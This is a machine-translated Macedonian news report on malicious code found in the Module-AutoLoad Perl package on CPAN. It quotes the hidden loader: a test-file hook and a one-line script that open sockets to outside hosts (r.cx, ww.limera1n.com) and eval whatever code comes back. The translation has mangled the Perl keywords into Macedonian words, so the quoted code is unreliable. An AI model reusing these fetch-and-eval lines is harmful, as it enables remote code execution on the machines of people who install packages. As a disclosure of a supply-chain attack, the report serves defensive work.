Откриен е злонамерен код во пакетот Module-AutoLoad Perl

Во пакетот Perl дистрибуиран преку директориумот CPAN Модул-Автоматско вчитување, дизајниран за автоматско вчитување на CPAN модулите во лет, идентификувани злонамерен код. Злонамерното вметнување беше пронајден во кодот за тестирање 05_rcx.t, која се испорачува од 2011 година.
Вреди да се одбележи дека се појавија прашања за вчитување сомнителен код Stackoverflow уште во 2016 година.

Злонамерната активност се сведува на обид за преземање и извршување на код од сервер од трета страна (http://r.cx:1/) за време на извршувањето на тест пакетот стартуван при инсталирање на модулот. Се претпоставува дека кодот првично преземен од надворешниот сервер не бил злонамерен, но сега барањето е пренасочено во доменот ww.limera1n.com, кој го обезбедува неговиот дел од кодот за извршување.

За да го организирате преземањето во датотека 05_rcx.t Се користи следниов код:

мојот $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
мојот $try = `$^X $prog`;

Наведениот код предизвикува извршување на скриптата ../contrib/RCX.pl, чија содржина е сведена на линијата:

користете lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};

Оваа скрипта се вчитува збунет користење на услугата perlobfuscator.com код од надворешниот домаќин r.cx (шифрите на знаците 82.46.99.88 одговараат на текстот „R.cX“) и го извршува во евалниот блок.

$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1″; печати <$b>;'
евал отпакува u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

По распакувањето, на крајот се извршува следново: код:

print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return warn$@while$b;1

Проблематичниот пакет сега е отстранет од складиштето. ПАУЗА (Сервер за испраќање на авторите на Perl), а сметката на авторот на модулот е блокирана. Во овој случај, модулот сè уште останува достапни во архивата на MetaCPAN и може директно да се инсталира од MetaCPAN користејќи некои комунални услуги како cpanminus. Забележано едека пакетот не бил широко дистрибуиран.

Интересно за дискусија поврзани и авторот на модулот, кој ги демантираше информациите дека е вметнат злонамерен код откако неговиот сајт „r.cx“ бил хакиран и објаснил дека само се забавува, а го користел perlobfuscator.com не за да скрие нешто, туку за да ја намали големината на кодот и поедноставување на неговото копирање преку таблата со исечоци. Изборот на името на функцијата „botstrap“ се објаснува со фактот дека овој збор „звучи како бот и е пократок од bootstrap“. Авторот на модулот, исто така, увери дека идентификуваните манипулации не вршат злонамерни дејства, туку само го демонстрираат вчитувањето и извршувањето на кодот преку TCP.

Извор: opennet.ru